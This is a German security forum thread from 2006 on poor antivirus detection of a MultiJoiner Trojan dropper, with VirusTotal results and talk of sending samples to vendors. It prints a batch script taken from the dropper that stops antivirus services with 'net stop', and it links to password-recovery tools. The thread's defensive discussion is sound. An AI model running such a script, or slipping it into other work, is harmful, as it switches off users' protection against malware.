Trojan-Dropper.Win32.MultiJoiner.13.j, nicht Wert eingepflegt zu werden? Einstellungen

[Stefan]

Vor gut 3 Wochen habe ich mal eine vermeintliche Bilddatei auf Jottis und Virustotal scannen lassen und anschließend an BitDefender gesandt.
Bis heute hat sich dort und auch bei einigen anderen anscheinend nichts getan.

Frage daher: Ist so ein Schädling es nicht Wert eingepflegt zu werden, oder gibt es im Moment einfach nur zu viel andere Malware die eingepflegt werden muss?




Kaspersky hat den Trojan-Dropper übrigens schon am 10.März entdeckt.

[JFK]

Frage daher: Ist so ein Schädling es nicht Wert eingepflegt zu werden, oder gibt es im Moment einfach nur zu viel andere Malware die eingepflegt werden muss?
[right][snapback]145089[/snapback][/right]

Natürlich ist es wert einen Schädling einzupflegen, sonst macht das AV Programm ja kaum einen Sinn
Die Geschäftsphilosophie einzelner Unternehmen ist eben unterschiedlich gestaltet, wegen dem "Wieso?" würde ich mal bei Bitdefender nachfragen.

JFK

[Domino]

Andererseits ist bei den meisten gerade polipos die Priorität.




Domino

[Gast_skep_*]

Ich hab hier auch so ein Kandidaten der nur von einigen erkannt wird. Laut Virustotal wird der Backdoor u.a. nicht von Avast, AVG, Bitdefender, DrWeb, NOD32v2, Panda, Sophos erkannt..und dies seit Wochen schon. Hab ihn zwar nirgends eingeschickt, aber da ich mehrmals in meinen Apache-Logs Hinweise auf diesen fand, kann das Teil ja nicht soo unbekannt sein.
Handeln tut es sich um:
BDS/Katien.R bzw. Backdoor.Tsunami.w, Backdoor.Kaitex ect. ..scheint ein Backdoor zu sein, den es schon seit 2001 gibt..

Der Beitrag wurde von skep bearbeitet: 25.04.2006, 11:24

[Voyager]

hab mir die Malware von Stefan mal schicken lassen .
die 314kb com-datei wird hier selbst nicht erkannt aber wenn ich sie im Gast-modus (wo ich keinerlei rechte besitze) starte werden einige sachen daraus gestartet ,darunter eine schmuddlige bilddatei und 2 rar-sfx dateien.
eine rar-sfx datei wird sofort erkannt als :

Quelle: danz6.exe
Klicken Sie hier, um weitere Informationen über dieses Risiko zu erhalten: Backdoor.Trojan
Durchgeführte Aktion: Gelöscht

bei der zweiten kommt eine rar-installer GUI die ich aber abgebrochen hatte. wenn ich jedoch da reinschaue kommt eine stille informationsanleitung zum vorschein, das heisst das rar-sfx hätte sich im silentmodus starten sollen.
darunter auch eine batch-datei die weitere malware installieren soll und ......

@echo off
start /min cmd /c net stop "Antivir Service" 2>nul
start /min cmd /c net stop antivirService 2>nul
#################
start /min cmd /c net stop "Antivir Scheduler" 2>nul
######dfgsdafaag
start /min cmd /c net stop navapsvc 2>nul
####start    /min cmd /c net stop jkfdlkjfdlkjfdslkg 2>nul
start /min cmd /c net stop "AntiVir PersonalEdition Classic Service" 2>nul
exit

Antivir killen sollte

p.s. die *.com selbst hab ich an symantec eingeschickt .

Der Beitrag wurde von bond7 bearbeitet: 25.04.2006, 12:51

[drweb-online]

Bitte die Datei an vms(at)drweb.com senden mit dem Subject "New Virus".

Danke
Michael

[Voyager]

ist abgeschickt , das passwort zum öffnen liegt bei.

[Lucky]

hab mir die Malware von Stefan mal schicken lassen  .
die 314kb com-datei wird hier selbst nicht erkannt aber wenn ich sie im Gast-modus (wo ich keinerlei rechte besitze) starte werden
[right][snapback]145156[/snapback][/right]

Doch hoffentlich nicht auf deinem Produktivsystem? Denn auch mit nur Gastrechten, kan man sich was einfangen...

Lucky

[Voyager]

auch mit nur Gastrechten, kan man sich was einfangen...

Möglichwerweise , aber die Wahrscheinlichkeit dazu ist eher gering weil die Zugriffs- und Schreibberechtigung zu niedrig ist.
Ich hab aber trotzdem alles kontrolliert , möchtest du mein Log nochmal gegenprüfen?

Der Beitrag wurde von bond7 bearbeitet: 25.04.2006, 14:34

[Stefan]

Na wie ich sehe scheint ja wenigstens einer der acht, die den Dropper nicht erkennen, Interesse zu zeigen.

[Gast_skep_*]

Den von mir weiter oben erwaehnten Backdoor erkennt DrWeb nun auch (BackDoor.Tsui)

[Kyu]

Was bitdefender angeht gibts zwei möglichkeiten. über das programm hochladen und abschicken, dann landet es im labor in rumänien (reaktionzeit war bei mir immer innerhalb von ca 1-2 tagen jedoch ohne feedback) - oder mit beigefügtem pw versehen an support@bitdefender.de - dann dauerts paar std länger, aber man bekommt feedback (ticket usw).

welchen weg hast du denn genommen?

[Stefan]

welchen weg hast du denn genommen?
[right][snapback]145239[/snapback][/right]

Ich hatte das Archiv mit PW versehen an virus_submission(at)bitdefender.com geschickt.

[Kyu]

die eingesandten verdachtsfälle über das programm landen übrigens direkt bei den technikern in rumänien. die nehmen die dinger nur ausseinander und bauen sie gleich in neuen signaturen ein, daher bekommt man darauf auch kein feedback. wer wert auf feedback legt soll sein zeug gepackt an support@bitdefender.de schicken.

hab gerade nochmal nachgeguckt welche adresse beim letzten gespräch angegeben wurde. keine ahnung wie das mit virus_submission ist.
falls du nochmal sowas hast kannst dus vielleicht über support@ versuchen =)

[Stefan]

Wenn ich an die letzten Einsendungen an "support(at)bitdefender.de" denke, belief sich das Feedback darauf, dass es eine Bestätigung des Verdachts auf Malware gab und man ein zügiges Bereitstellen einer Signatur versprach. Ne knappe Woche hat es dann trotzdem noch gedauert.

Ach ja, in der Mail gab es übrigens auch noch den Hinweis, dass wenn man Dateien direkt an "virus_submission(at)bitdefender.com" senden würde, man dort schneller reagieren könnte.

Der Beitrag wurde von Stefan bearbeitet: 25.04.2006, 21:00

[Gast_blueX_*]

@stefan
@skep
@bond

http://www.rokop-security.de/index.php?showtopic=8685

Ich habe mir einmal die genannten Adressen als Fließtext angelegt, so dass ich nur den Fließtext einkopiert habe.
Solltet ihr Interesse habe, dann schick ich euch den Fließtext und keine Arbeit habt.

[Kyu]

na dann mal sehen wie lang es noch dauert =)

[Stefan]

Übrigens bei Dr.Web hat man sich Mühe gegeben.
Der Dropper wird jetzt als "Trojan.MulDrop.3684" erkannt.

[Gast_rock_*]

ich frag mich schon seit langem wie diese uploadscanner arbeiten...

hab aus meinen set mal den stubby (ein ganz altes klumpert) hochgeladen...

und KEINER erkennts plötzlich!

STATUS: FINISHEDComplete scanning result of "stubby_d.exe", received in VirusTotal at 04.27.2006, 10:12:20 (CET).

Antivirus Version Update Result
AntiVir 6.34.0.24 04.20.2006 no virus found
Avast 4.6.695.0 04.26.2006 no virus found
AVG 386 04.26.2006 no virus found
Avira 6.34.1.58 04.27.2006 no virus found
BitDefender 7.2 04.27.2006 no virus found
CAT-QuickHeal 8.00 04.26.2006 no virus found
ClamAV devel-20060202 04.26.2006 no virus found
DrWeb 4.33 04.27.2006 no virus found
eTrust-InoculateIT 23.71.140 04.27.2006 no virus found
eTrust-Vet 12.4.2181 04.27.2006 no virus found
Ewido 3.5 04.27.2006 no virus found
Fortinet 2.71.0.0 04.27.2006 no virus found
F-Prot 3.16c 04.26.2006 no virus found
Ikarus 0.2.59.0 04.26.2006 no virus found
Kaspersky 4.0.2.24 04.27.2006 no virus found
McAfee 4749 04.26.2006 no virus found
NOD32v2 1.1509 04.27.2006 no virus found
Norman 5.90.17 04.26.2006 no virus found
Panda 9.0.0.4 04.27.2006 no virus found
Sophos 4.05.0 04.27.2006 no virus found
Symantec 8.0 04.27.2006 no virus found
TheHacker 5.9.7.135 04.25.2006 no virus found
UNA 1.83 04.26.2006 no virus found
VBA32 3.11.0 04.26.2006 no virus found

mein mc afee springt aber natürlich sofort an, wenn ich ihn entpacken will!

[Gast_rock_*]

hier detto! mc afee knallt sofort an! zwar nur ein passwort tool, jedoch...NICHTS GEFUNDEN!

STATUS: FINISHEDComplete scanning result of "RiskWare.PSWTool.Snitch.11.exe", received in VirusTotal at 04.27.2006, 10:29:06 (CET).

Antivirus Version Update Result
AntiVir 6.34.0.24 04.20.2006 no virus found
Avast 4.6.695.0 04.26.2006 no virus found
AVG 386 04.26.2006 no virus found
Avira 6.34.1.58 04.27.2006 no virus found
BitDefender 7.2 04.27.2006 no virus found
CAT-QuickHeal 8.00 04.26.2006 no virus found
ClamAV devel-20060202 04.26.2006 no virus found
DrWeb 4.33 04.27.2006 no virus found
eTrust-InoculateIT 23.71.140 04.27.2006 no virus found
eTrust-Vet 12.4.2181 04.27.2006 no virus found
Ewido 3.5 04.27.2006 no virus found
Fortinet 2.71.0.0 04.27.2006 no virus found
F-Prot 3.16c 04.26.2006 no virus found
Ikarus 0.2.59.0 04.26.2006 no virus found
Kaspersky 4.0.2.24 04.27.2006 no virus found
McAfee 4749 04.26.2006 no virus found
NOD32v2 1.1509 04.27.2006 no virus found
Norman 5.90.17 04.26.2006 no virus found
Panda 9.0.0.4 04.27.2006 no virus found
Sophos 4.05.0 04.27.2006 no virus found
Symantec 8.0 04.27.2006 no virus found
TheHacker 5.9.7.135 04.25.2006 no virus found
UNA 1.83 04.26.2006 no virus found
VBA32 3.11.0 04.26.2006 no virus found
_____________________________

dieses tool wurde seinezeit von kaspersky als solches wie es im text steht erkannt!

rock

edit: bild von aktueller mc afee erkennung:


Der Beitrag wurde von rock bearbeitet: 27.04.2006, 09:36

[drweb-online]

@rock:
Kannst Du mal bitte die Viren zu vms(at)drweb.com hochladen mit dem Kommentar (auf englisch) ?

Danke
Michael

[Gast_rock_*]

edit: abgeschickt!



Der Beitrag wurde von rock bearbeitet: 27.04.2006, 10:32

[Kyu]

der name der .exe sagt mir zwar nix, aber du kannst den leuten bei virustotal einfach mailen und sie selbst fragen. bei mir haben sie (wochentag, vormittags) sehr schnell (jeweils unter 30min) reagiert.

...und uns dann bescheid geben was die antwort war =)

[Gast_rock_*]

könnt ihr euch noch an das thema von zottel oder zausel erinnern mit dem dialer vor kurzem?

den kennt beim hochladen gerade mal ewido und 2 scanner in der heuristik und im mem-scan und nod und panda und auch fortinet verdächtigt...

wurde auch bis zur verglühung abgeschickt und hochgeladen damals.....

ich mach mir garkeine mühe mehr irgendwem zu schreiben...ich sammle den kram...wers haben will, bitteschön! das was ich hab sollte aber schon jeder von denen die nichts erkennt haben..da ich das ja schon wieder hochlade heute...nur so für die zukunft...

vielleicht ist es halt eben nicht der mühe wert...

STATUS: SCANNINGFile "winsis32.exe" received on 04.27.2006 at 17:25:19 (CET) is being scanned by VirusTotal in this moment. Results will be shown as they're generated.

Antivirus Version Update Result

AntiVir 6.34.0.24 04.20.2006 Heuristic/Backdoor.Dropper
Avast 4.6.695.0 04.26.2006 no virus found
AVG 386 04.26.2006 no virus found
Avira 6.34.1.58 04.27.2006 no virus found
BitDefender 7.2 04.27.2006 MemScan:Trojan.PornDialer.A
CAT-QuickHeal 8.00 04.26.2006 no virus found
ClamAV devel-20060202 04.26.2006 no virus found
DrWeb 4.33 04.27.2006 no virus found
eTrust-InoculateIT 23.71.140 04.27.2006 no virus found
eTrust-Vet 12.4.2181 04.27.2006 no virus found
Ewido 3.5 04.27.2006 Dropper.Agent.ajc
Fortinet 2.71.0.0 04.27.2006 suspicious
F-Prot 3.16c 04.26.2006 no virus found
Ikarus 0.2.59.0 04.27.2006 no virus found
Kaspersky 4.0.2.24 04.27.2006 no virus found
McAfee 4749 04.26.2006 no virus found
Microsoft 1.1372 04.27.2006 no virus found
NOD32v2 1.1509 04.27.2006 a variant of Win32/Dialer.PornDial.F
Norman 5.90.17 04.27.2006 no virus found
Panda 9.0.0.4 04.27.2006 Suspicious file
Sophos 4.05.0 04.27.2006 no virus found
Symantec 8.0 04.27.2006 no virus found
TheHacker 5.9.7.135 04.25.2006 no virus found

[Gast_blueX_*]

Warum schickst du das Zeug nicht ein?

[Gast_rock_*]

was glaubst du hab ich die letzten jahre immer gemacht?

ich habs so manchen gleich ein ganzes packet geschickt...

vieles ist schon vom vorjahr und auch älter...

möglicherweise ist einiges beschädigt oder nicht mehr korrekt lauffähig, was daher nicht mehr in die erkennung aufgenommen wurde....

abgesehen davon - war nicht irgendwo die rede das durch das absenden und treffer es sowieso an die jeweiligen hersteller weitergeschickt wird?

[Gast_blueX_*]

Hast du denn die Datei winsis32.exe auch abgeschickt?

Naja, ich kann mir vorstellen, dass die Virenschutzhersteller schon genügend mit den Einsendungen zu tun haben und Files, die von Jotti oder Virustotal nur in seltenen Fällen einpflegen.

[drweb-online]

@rock:

Wenn Du mir (Dr.Web) einen Gefallen tun willst - lade die Dateien bitte auf unseren FTP-Server hoch - es gibt dafuer einen speziellen Upload account.

Unsere Technik wird dann der Sache jeweils nachgehen, solange bis wir fuer jedes File eine Antwort haben.
Das gilt auch fuer zukuenftige Einsendungen.

*Unsere* Einsendungen werden meist innerhalb von 10 Minuten bis max. 2 Stunden bearbeitet.

Gib Bescheid, ich sende Dir ueber PM dann einen account.

Wenn es Dir zu aufwaendig ist, habe ich auch Verstaendnis dafuer

Danke,
Michael

[Gast_rock_*]

@rock:
Wenn Du mir (Dr.Web) einen Gefallen tun willst - lade die Dateien bitte auf unseren FTP-Server hoch - es gibt dafuer einen speziellen Upload account.

ich hab bereits ein paket gesendet mit 54 files.

alles jetzt wieder entpacken und einzeln abschicken ist eine abendfüllende aufgabe...

hmm....kann ich jetzt aber leider nicht garantieren dran zu bleiben bis zum bitteren ende...

ansonsten gerne...mit dem account per pm...kann ich ja im laufe des tages morgen machen...wenns recht ist...

rock

[drweb-online]

@rock:

nichts entpacken,... das macht unsere Technik.
Einfach rauflegen. Mit so wenig AUfwand wie moeglich

Account kommt.

Micha

[Kenshiro]

...wird immer gefährlicher mit diesen Viren...

[Gast_Scrapie_*]

...wird immer gefährlicher mit diesen Viren...
[right][snapback]145548[/snapback][/right]

Vor allem wenn die Unpackengines schon Rost ansetzen:






Heute kam neue Version von UPX raus.
Scheint immer noch AVs zu geben, die diesen acht Jahre (!) alten, OpenSource- Packer (!) immer noch nicht im Griff haben. Von den drei Schnarchnasen, welche noch nicht mal den originalen MicroJoiner erkennen (obwohl schon vor 1 1/2 Jahre public released) reden wir jetzt mal gar nicht....
Aber vielleicht erkennen die drei ja den extrem verbreiteten Polip.A-Virus

Gruß,
Scrapie

[Gast_rock_*]

hmm..wieder son ergebnis wo ich mich sofort auskenn

was ist es nun...dropper? oder ein passworttool?

oder ein dropper der erst ein passworttool anlegt...??

diesen pinch hab ich schon oft gehört, multijoiner hingegen nicht...

übrigens passwortgeschichten...bei nirsoft gibts passworttools gleich im halben dutzend zum freien download...nur in jedem steckt entweder ein sogenantnes erkanntes passworttool bis hinzum trojaner. mc afee erkennt sie alel schon beim anlachen...

aber bitte...für ganz schlaue...wer bei nirsoft tools ladet und nciht weis was damit anzufangen ist...wenigstens NICHT installieren...wer weis ob die dann nicht erst was droppen...

man kann die sammlung halt ein bissl erweitern...

bei der gelegenheit kann es ja wer einzeln bei virustotal hochladen wenn er sich die mühe machen will....virenscanner ausschalten sonst knallt es dauernd an bei jedem absende versuch der jeweiligen anwendungen...ich wette es werden viele wieder nicht erkennen...es müssten 6 stück sein! eines etwas schärfer!

http://www.pc-special.net/?idart=3189

und hier das zip mit dem ganzen klumpert auf einmal!

http://www.bestfiles.eu/groups/sicherheit_n.html



Der Beitrag wurde von rock bearbeitet: 28.04.2006, 10:28

[Gast_rock_*]

na wer sagts denn...schon der erste kleine asterix logger....mag wohl (kaum) wer erkennen....

STATUS: FINISHEDComplete scanning result of "astlog.exe", received in VirusTotal at 04.28.2006, 11:30:19 (CET).

Antivirus Version Update Result
AntiVir 6.34.0.24 04.20.2006 no virus found
Avast 4.6.695.0 04.26.2006 no virus found
AVG 386 04.27.2006 no virus found
Avira 6.34.1.58 04.28.2006 no virus found
BitDefender 7.2 04.28.2006 no virus found
CAT-QuickHeal 8.00 04.26.2006 no virus found
ClamAV devel-20060202 04.27.2006 no virus found
DrWeb 4.33 04.28.2006 no virus found
eTrust-InoculateIT 23.71.141 04.28.2006 no virus found
eTrust-Vet 12.4.2183 04.28.2006 no virus found
Ewido 3.5 04.27.2006 no virus found
Fortinet 2.71.0.0 04.27.2006 suspicious
F-Prot 3.16c 04.26.2006 no virus found
Ikarus 0.2.59.0 04.28.2006 P2P-Worm.Win32.Polipos.a
Kaspersky 4.0.2.24 04.28.2006 no virus found
McAfee 4750 04.27.2006 no virus found
Microsoft 1.1372 04.28.2006 no virus found
NOD32v2 1.1510 04.27.2006 no virus found
Norman 5.90.17 04.27.2006 no virus found
Panda 9.0.0.4 04.28.2006 no virus found
Sophos 4.05.0 04.28.2006 no virus found
Symantec 8.0 04.28.2006 no virus found
TheHacker 5.9.7.135 04.25.2006 no virus found
UNA 1.83 04.27.2006 no virus found
VBA32 3.11.0 04.27.2006 no virus found

Der Beitrag wurde von rock bearbeitet: 28.04.2006, 10:34

[Gast_rock_*]

schon ein bissl besser

STATUS: FINISHEDComplete scanning result of "mailpv.exe", received in VirusTotal at 04.28.2006, 11:33:56 (CET).

Antivirus Version Update Result
AntiVir 6.34.0.24 04.20.2006 no virus found
Avast 4.6.695.0 04.26.2006 no virus found
AVG 386 04.27.2006 no virus found
Avira 6.34.1.58 04.28.2006 SPR/PSW.MailPassView.130.4
BitDefender 7.2 04.28.2006 Spyware.Pws.Mailpassview.130
CAT-QuickHeal 8.00 04.26.2006 no virus found
ClamAV devel-20060202 04.27.2006 no virus found
DrWeb 4.33 04.28.2006 no virus found
eTrust-InoculateIT 23.71.141 04.28.2006 no virus found
eTrust-Vet 12.4.2183 04.28.2006 no virus found
Ewido 3.5 04.27.2006 Not-A-Virus.PSWTool.Win32.MailPassView.130
Fortinet 2.71.0.0 04.27.2006 PWS.F!tr
F-Prot 3.16c 04.26.2006 no virus found
Ikarus 0.2.59.0 04.28.2006 PSWTool.Win32.MailPassView.130
Kaspersky 4.0.2.24 04.28.2006 not-a-virus:PSWTool.Win32.MailPassView.130
McAfee 4750 04.27.2006 Generic PWS.f
Microsoft 1.1372 04.28.2006 no virus found
NOD32v2 1.1510 04.27.2006 no virus found
Norman 5.90.17 04.27.2006 no virus found
Panda 9.0.0.4 04.28.2006 Suspicious file
Sophos 4.05.0 04.28.2006 no virus found
Symantec 8.0 04.28.2006 no virus found
TheHacker 5.9.7.135 04.25.2006 Trojan/MailPassView.130
UNA 1.83 04.27.2006 no virus found
VBA32 3.11.0 04.27.2006 no virus found

===============

[Gast_2cool_*]

Jo, da wird so einiges nicht entdeckt, ist aber die Frage,
mit welchen Signaturen und Einstellungen gescannt wird:

Wenn irgendwas nicht bei Virustotal gefunden wird heisst das noch lange nicht zwangsweise dass es der Standalone Scanner auch nicht findet.....

Quelle


Ich könnte mir vorstellen, dass bei einem Onlineangebot wie Virustotal oder Jotti
z.B. bei KAV nicht mit den erweiterten Sigs gescannt wird.....

Der Beitrag wurde von 2cool bearbeitet: 28.04.2006, 12:24

[Anubis]

Jo, da wird so einiges nicht entdeckt, ist aber die Frage,
mit welchen Signaturen und Einstellungen gescannt wird:

http://www.rokop-security.de/index.php?sho...ndpost&p=144790
Ich könnte mir vorstellen, dass bei einem Onlineangebot wie Virustotal oder Jotti
z.B. bei KAV nicht mit den erweiterten Sigs gescannt wird.....
[right][snapback]145628[/snapback][/right]

Aber bei NOD32 mit Heuristik und trotzdem wird beide Male nichts gefunden.

[Gast_rock_*]

auch antivir scannt mit heuristik und bitdefender mit mem scan...wie man beides in einen der früheren logs sehen kann...

und erkennt hier nur gering bis nichts...

gerade antivir der oft moralische signturen pflegt, wie zum beispiel sogar das dämliche moorhuhn! (meldet antivir das moorhuhn eigentlcih noch??) brüllll!!!!!!!!

[Gast_2cool_*]

Aber bei NOD32 mit Heuristik und trotzdem wird beide Male nichts gefunden. [right][snapback]145630[/snapback][/right]

Ja, stimmt wohl, ein Keylogger ist imho etwas,
das eine gute Heuristik finden könnte,
auch wenn diese spezielle Datei unbekannt ist.




Dumm'n Spruch:
(nicht verkneifen kann)

Was lernen wir daraus?
Bei dem jetzigen Stand der Entwicklung ist auch eine angeblich gute Heuristik
noch nicht in der Lage, jede Malware an ihrem potentiellen Verhalten zu erkennen.

Oder anders formuliert:
Es geht nichts über gute Signaturen

[Anubis]

Wäre es technisch denn nicht machbar, genau eine solche Heuristik zu fertigen ?

[Gast_rock_*]

schade das sie trendmicro nicht miteinbeziehen in virustotal...der würd noch fehlen, dann sind alle großen und namhaften zusammen.

und trendmicro antspyware ist echt nicht schlecht...hat auch den passwort tools ordner gemeldet! hab aber nicht alle drangenommen...

[drweb-online]

kann mir nicht jemand mal die winsis32.exe und mailpv.exe zukommen lassen?

Bei DrWeb scheint sie nicht angekommen zu sein.

ftp: newvirus.drweb-online.com
user: newvirus
pwd: new_virus_up

Verzeichnis ist nicht listbar, download nicht moeglich - nur upload.
Upload von unverschluesselten Dateien ist moeglich (wird nicht automatisch gescannt ..)

Michael

[Gast_rock_*]

ich habs dir jetzt nocheinmal auf den ersten server geladen (rock).

passwort wie gehabt. ist zwar auch ein crypto aber du brauchst kein programm, einfach die exe mit dem passwort entpacken...

hab dir aber schon alles geschickt, einmal crypto, dann 12 stück "lose" in einem zipordner incl. winsis32.exe. !

diese winsis32.exe ist "aussen" benannt mit backdoor dropper, porndialer.

rock

[Voyager]

wie hastn du das zusammenbekommen rock, hast du beim Surfen nicht aufgepasst?

[drweb-online]

@rock
Es wurde schon so einiges hinzugefuegt heute.
(winsis32.exe war inzwischen dort schon bekannt - ich hatte die nur uebersehen.)

Allerdings die mailpv.exe habe ich nicht gesehen.

Danke.

[Gast_rock_*]

die mailpv.exe findest du hier:

http://www.rokop-security.de/index.php?sho...ndpost&p=145613

es ist eine der passwort tools von nirsoft, indemfall das für mail. es sind alle in einem zipordner. 6 stück.

haben wir eigentlich die letzetn vielen postings davon gepostet...irgendwie...

nagut, der stress!

[drweb-online]

Ha,...hast Recht,... waren zu viele Files

Sollte nun alles bekannt/hinzugefuegt sein, auch die Tools:

Asterisk Logger\astlog.exe is hacktool program Tool.PassView - ignored!
Dialupass\dialupass.exe is hacktool program Tool.DialupPass.243 - ignored!
Mail PassView\mailpv.exe is hacktool program Tool.ShowPass - ignored!
MessenPass\mspass.exe is hacktool program Tool.MessenPass - ignored!
Network Password Recovery\netpass.exe is hacktool program Tool.Netpass - ignored!
Protected Storage PassView\pspv.exe is hacktool program Tool.PassView - ignored!

"ignored" ist die default-Einstellung fuer HackTools hier.

Danke fiuer die Geduld!

Micha

[Gast_rock_*]

wie hastn du das zusammenbekommen rock, hast du beim Surfen nicht aufgepasst? 

hehe...na sowas findet man irgendwie über den lauf der zeit...

Danke fiuer die Geduld! 

gern geschehen...auch in meinem interesse!

den server account behalt ich mir mal bis auf weiteres!

[Gast_rock_*]

jetzt hab ich auch endlcih das thema gefunden wo die winsis32.exe gepostet war!
nur hat die nichts mit dem small zu tun den er zu beginn gepostet hat...die winsis32.exe war zusätzlich am rechner und in einem link aus dem log ersichtlich..die hat nämlich sein scanner und was er nutze nicht erkannt...

http://www.rokop-security.de/index.php?sho...ndpost&p=140382

beginnt etwas weiter oben...ist mittlerweile editiert. (link weg)

wurde seinerzeit mehrmals hochgeladen, (1 Monat her) nicht nur von mir sicherlich..zuminderst vom anwender selber,...soviel ein letztes mal zur automatischen weiterleitung, bzw. zur "signatur-verbesserung".

edit:
hier das posting wo noch die links zu der berüchtigen datei sind...gibts gleich ein paar zips davon...kann sich ja micha von dr.web vielleicht auch noch ganz anschauen wo da was wirklich herkommt...und was es da hat...ob da echt ein porndial oder so'n zeug in der anwendung Driver Genius oder drumherum steckt...

http://www.rokop-security.de/index.php?sho...ndpost&p=141510


Der Beitrag wurde von rock bearbeitet: 29.04.2006, 10:03

[drweb-online]

...ob da echt ein porndial oder so'n zeug in der anwendung Driver Genius oder drumherum steckt...

http://www.rokop-security.de/index.php?sho...ndpost&p=141510

[right][snapback]145729[/snapback][/right]

Hmm... Du meinst aber nicht das
"WinSIS-X Schäferhunde Informations System - WinSIS-X DataBase"

http://home19.inet.tele.dk/winsisx/SISdata...er/hunddown.htm

(vielleicht sind die ja auch infiziert - mit der "Hundegrippe" )

Micha

[Gast_rock_*]

umpf! das hätt ich mir sparen könne...wenn ich jetzt so nachlese glaub ich zottel wusste garnimmer was wer wo ist...das sind einfach irgendwelche links....was ist Genius irgendwo?? welche schäferhunde??

wie gesagt der porndialer winsis32.exe war von impotato . der link fehlt jedoch

bei sunbelt gibts aber darüber eine info. (impotato porndialer)



Der Beitrag wurde von rock bearbeitet: 29.04.2006, 10:55

[Stefan]

Also BitDefender, eTrust, McAfee und Symantec, so langsam wird es peinlich:


... und falls wieder der Einwand kommt, dass es Abweichungen zwischen den Scannern auf Virustotal bzw. Jottis und den zu Hause installierten Windows-Versionen geben kann, so kann ich das zumindest für BitDefender ausschließen. Da kommt die 9er Standard auch zu keinem anderen Ergebnis.

[Gast_Scrapie_*]

Tag

Nicht nur bei v1.3 siehts so besch**** aus, auch bei der Neusten.
Seit meinem letzten Posting hier am 27.04.06 um 22:49 hat sich bei der Erkennung des Original-Binders nichts getan:

Zum Vergleiche das Bild vom 27.04:



Und bei der Einbindung der neuen UPX-Version hat einzig und alleine Ikarus es fertig gebracht, dafür hat TheHacker ihn wieder entfernt?:

Zum Vergleiche das Bild vom 27.04:




Was soll man da noch groß sagen?


Scrapie

[Manu]

Viel kurioser ist das folgende Ergebnis:
Das Teil schwirrt UPX-gepackt im Netz herum. Die Erkennung sieht so aus:


"Entpackt" man es und lässt es dann checken, erhält man dieses Ergebnis:



Bitter, wenn anscheinend so stur Signaturen eingepflegt werden, dass man das Entpacken ganz außen vor lässt.

[Stefan]

Ohne Worte.

[Gast_rock_*]

tja...scheinbar wollen manche auch nicht bei schärferen sachen - ds ding ist aber schon ein etwas älteres....

trotzdem...3 nieten....

AntiVir Worm/Drefir.G.2 gefunden
ArcaVir Trojan.Rbot.Gen.107312.MX gefunden
Avast Win32:Trojan-gen. {Other} gefunden
AVG Antivirus IRC/BackDoor.SdBot.IOW gefunden
BitDefender Win32.Drefir.G@mm gefunden
ClamAV Keine Viren gefunden
Dr.Web Win32.IRC.Bot.based gefunden
F-Prot Antivirus Keine Viren gefunden
Fortinet W32/RBot!tr.bdr gefunden
Kaspersky Anti-Virus Backdoor.Win32.Rbot.gen gefunden
NOD32 Win32/Rbot gefunden
Norman Virus Control W32/Spybot.XBR gefunden
UNA Keine Viren gefunden
VirusBuster Worm.Rbot.CXW gefunden
VBA32 Backdoor.Win32.Rbot.gen gefunden

was solls...das ganze hat maximal zur folge das die mitarbeit oder das interesse an einsendungen und alles drum herum den bach runter geht...

[Gast_rock_*]

Also BitDefender, eTrust, McAfee und Symantec, so langsam wird es peinlich:

stef,...was ist dieses multijoiner oder microjoiner eigentlich was schlimmes?

kannst du mir das zwecks mc afee auch schicken?

mal sehen ob es am desktopscanner meckert.

wenn nicht...pech gehabt!

[Stefan]

Ich würde ihn dir ja gern schicken, wenn du mir eine Mailadresse hinterlässt.
Allerdings funktioniert das PM-System wie es aussieht noch nicht wieder.
Also lass dir was einfallen.

stef,...was ist dieses multijoiner oder microjoiner eigentlich was schlimmes?

Was es macht, hatte @bond7 hier mal angerissen.

[Gast_rock_*]

ja schicks einfach mal an .....

danke!

Der Beitrag wurde von rock bearbeitet: 04.05.2006, 19:48

[Voyager]

Quelle: Manuelle Prüfung
Risikokategorie Hacker-Tool
Gesamtrisikoauswirkung: Hoch
Leistung: Hoch
Datenschutz: Hoch
Entfernen: Hoch
Stealth: Hoch
Klicken Sie hier, um weitere Informationen über dieses Risiko zu erhalten: Hacktool.Exebind
Durchgeführte Aktion: Entfernt
Beschreibung: Betroffene Bereiche:
1 Dateien:
C:\Bild-Dieter__JPG\Bild-Dieter__JPG.com - Gelöscht

wann der Trojan-Dropper.Win32.MultiJoiner.13.j, eingepflegt wurde kann ich allerdings nicht sagen weil ich heute per zufall mal im Quarantäneordner war.

[Stefan]

ja schicks einfach mal an .....
[right][snapback]146686[/snapback][/right]

Wat is denn nu @rock?
Erkennt es dein McAfee@Home?

[Gast_rock_*]

nö! leider nicht.

und ich kanns ncihtmal an mc afee schicken...da dieses windows xp keine zip verschlüsseln kann, wie es windows millenium konnte. es kann lediglich verschlüsselte zip von anderen leuten öffnen mit passwort. (ich frag mich anbei bis heute wieso microsoft das feature mit den zipverschlüsseln bei XP eingestellt hat anstatt zu verbessern!) so ist man gezwungen eigens dafür ein programm zu kaufen oder laden....(okey...bald sind wir bei drei seiten nebenbeithema! )

so , also....ich habs dann auf alle arten und möglichkeiten geschickt...auch mit cryptoprogrammen...aber mc afee wollen es nicht um die burg annehmen...wenn es kein stinknormaler verschlüsselter zipordner ist der das eigene passwort infected haben muss.

tja..leider...

[Gast_rock_*]

aber es sieht bei den anderen immer noch so aus: (bei virustotal)

AntiVir 6.34.0.24 04.20.2006 TR/Drop.MultiJoiner.13.J.5
Avast 4.6.695.0 05.05.2006 Win32:Trojan-gen. {VC}
AVG 386 05.05.2006 Dropper.Generic.EFW
Avira 6.34.1.58 05.06.2006 TR/Drop.MultiJoiner.13.J.5
BitDefender 7.2 05.07.2006 no virus found
CAT-QuickHeal 8.00 05.05.2006 no virus found
ClamAV devel-20060426 05.07.2006 Trojan.Dropper.Small-51
DrWeb 4.33 05.07.2006 Trojan.MulDrop.3684
eTrust-InoculateIT 23.72.1 05.06.2006 no virus found
eTrust-Vet 12.4.2194 05.04.2006 no virus found
Ewido 3.5 05.07.2006 Dropper.MultiJoiner.13.j
Fortinet 2.71.0.0 05.07.2006 W32/MultiJoiner.J!tr
F-Prot 3.16c 05.05.2006 destructive program named W32/Trojan.BEN
Ikarus 0.2.65.0 05.05.2006 Trojan-Dropper.Win32.MultiJoiner.13.J
Kaspersky 4.0.2.24 05.07.2006 Trojan-Dropper.Win32.MultiJoiner.13.j
McAfee 4756 05.05.2006 no virus found
Microsoft 1.1372 05.07.2006 no virus found
NOD32v2 1.1523 05.05.2006 Win32/TrojanDropper.Agent.AGE
Norman 5.90.17 05.05.2006 W32/Multijoiner.C
